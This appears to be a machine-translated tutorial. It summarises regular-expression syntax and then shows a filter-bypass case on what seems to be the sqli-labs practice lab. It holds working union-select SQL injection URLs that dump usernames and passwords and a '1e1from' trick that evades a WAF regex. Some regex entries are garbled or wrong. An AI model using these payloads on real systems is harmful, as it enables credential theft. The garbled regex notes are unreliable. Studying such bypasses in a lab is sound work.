Regular expressions and bypass case recurrence

One 、 Regular expression summary

1、 Regular expression definition
Regular expressions describe a pattern of string matching , Can be used to check if a string contains a certain seed string 、 Replace a matched substring or remove a substring from a string that meets a condition, etc .
2、 Parameters

Matching character

. Match any single character , Cannot match empty row
[] Match any single character in the specified range
[^] Take the opposite
[:alnum:] or [0-9a-zA-Z]
[:alpha:] or [a-zA-Z]
[:upper:] or [A-Z]
[:lower:] or [a-z]
[:blank:] Blank character （ Spaces and tabs ）
[:space:] Horizontal and vertical white space characters （ Than [:blank:] It covers a wide range ）
[:cntrl:] Non printable control characters （ Backspace 、 Delete 、 Alarm bell …）
[:digit:] Decimal number or [0-9]
[:xdigit:] Hexadecimal number
[:graph:] Printable non blank characters
[:print:] Printable characters
[:punct:] Punctuation

Number of matches

• • Match preceding characters any number of times , Include 0 Time , Greedy mode ： Match as long as possible
• .* Any character of any preceding length , barring 0 Time
• ? Match characters before 0 or 1 Time
• + Match characters before At least 1 Time
• {n} Match preceding characters n Time
• {m,n} Match preceding characters at least m Time , at most n Time
• {,n} Match preceding characters up to n Time
• {n,} Match preceding characters at least n Time

Determine the location ： Locate where it appears

• ^ Anchor anchoring , Left most for mode
• ^ Anchor anchoring , Left most for mode
• $ Tail anchoring , For the far right side of the pattern
• ^PATTERN$, For pattern matching entire line
• ^$ Blank line
• < or \b Initial anchoring , For the left side of the word pattern
• > or \b Suffix anchor ; For the right side of the word pattern
• <PATTERN>

Group and backward reference

- grouping ：() Bundle one or more characters together , Treat as a whole
- The matching contents of the patterns in grouping brackets will be recorded in the internal variables by the regular expression engine , These variables are named : \1, \2, \3, …

Backward reference

- The character that matches the pattern in the grouping bracket before the reference , Not the pattern itself
\1 Represents the character to which the pattern between the first open bracket from the left and the matching right bracket matches
\2 From the left 2 Characters matched by opening parentheses and patterns between matching closing parentheses , And so on
& Represents all characters in the previous group

Greedy matching and non-greedy matching

** Greedy matching ：** The usual behavior of regular expressions is to match as many characters as possible , For example, this expression ：a.*b, It will match the longest a Start , With b Ending string , If you use it to search aabab Words , It will match the entire string aabab

** Laziness matches ：** Matching as few characters as possible , Use the least number of repetitions while making the whole match successful , Just put a question mark after it ? that will do , for example a.*?b Match the shortest , With a Start , With b Ending string , If you apply it to aabab Words , It will match aab and ab, Why the first match is aab（ First through third character ） instead of ab（ Second to third characters ）？ In short , Because there's a rule in regular expressions that is more lazy ／ Greedy rules have a higher priority , Namely ： The first match has the highest priority

Two 、 Bypass case recurrence

select\b[\s\S]*\bfrom

When the input ：

http://localhost/Less-1/?id=-1%E2%80%98%20union%20select%201,(select%20group_concat(username,0x3a,password),from%20users),3--+

Then there is ：
Bypass method ：
stay from Input scientific counting method in front

http://localhost/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password),1e1from%20users),3--+

http://localhost/Less-1/?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),1e1from%20users--+20

Successfully bypassed